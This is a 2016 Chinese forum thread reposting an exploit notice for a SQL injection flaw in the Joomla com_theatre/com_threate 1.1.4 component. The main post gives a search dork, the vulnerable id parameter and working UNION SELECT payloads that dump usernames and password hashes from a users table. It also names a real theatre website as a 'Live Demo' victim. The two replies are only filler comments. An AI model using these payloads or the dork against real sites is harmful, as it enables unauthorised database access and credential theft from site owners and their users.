请选择 进入手机版 | 继续访问电脑版
查看: 1271|回复: 2

Joomla com_threate 1.1.4注入漏洞

[复制链接]
  • TA的每日心情

    7 天前
  • 签到天数: 905 天

    [LV.10]以坛为家III

    发表于 2016-7-11 10:20:12 | 显示全部楼层 |阅读模式
    [PHP] 纯文本查看 复制代码
    ######################
    # Exploit Title :  Joomla com_threate 1.1.4 SQL injection
    # Exploit Author : xBADGIRL21
    # Dork : index.php?option=com_threate
    # version: 1.1.4
    # Vendor Homepage : [url]http://joomlic.com/[/url]
    # Tested on: [ Windows ]
    # skype:xbadgirl21
    # Date: 2016/07/09
    # video Proof : [url]https://youtu.be/WXqrK7dqGaY[/url]
    ######################
    # PoC:
    # [id=]  Get Parameter Vulnerable To SQL
    #
    # http://server/index.php?option=com_theatre&view=show&id=[SQLi]
    #
    # Demo
    # http://server/index.php?option=com_theatre&view=show&id=36'
    #
    # http://server/index.php?option=com_theatre&view=show&id=-36  /*!12345union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43
    #
    # http://server/index.php?option=com_theatre&view=show&id=-36  /*!12345union*/ select 1,2,3,4,5,6,7,8,9,10,/*!12345group_coNcat(username,0x3a,password)*/,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 from aur_users--
    #
    # Live Demo :
    # [url]https://www.auroratheatre.org/[/url]
    #
    ######################
    # Discovered by : xBADGIRL21
    # Greetz : All Mauritanien Hackers - NoWhere
    #######################
    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    2016-11-12 12:49
  • 签到天数: 222 天

    [LV.7]常住居民III

    发表于 2016-7-11 13:10:12 | 显示全部楼层
    火钳留名
    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    2020-1-18 15:18
  • 签到天数: 22 天

    [LV.4]偶尔看看III

    发表于 2016-7-11 14:27:05 | 显示全部楼层
    火钳刘明
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表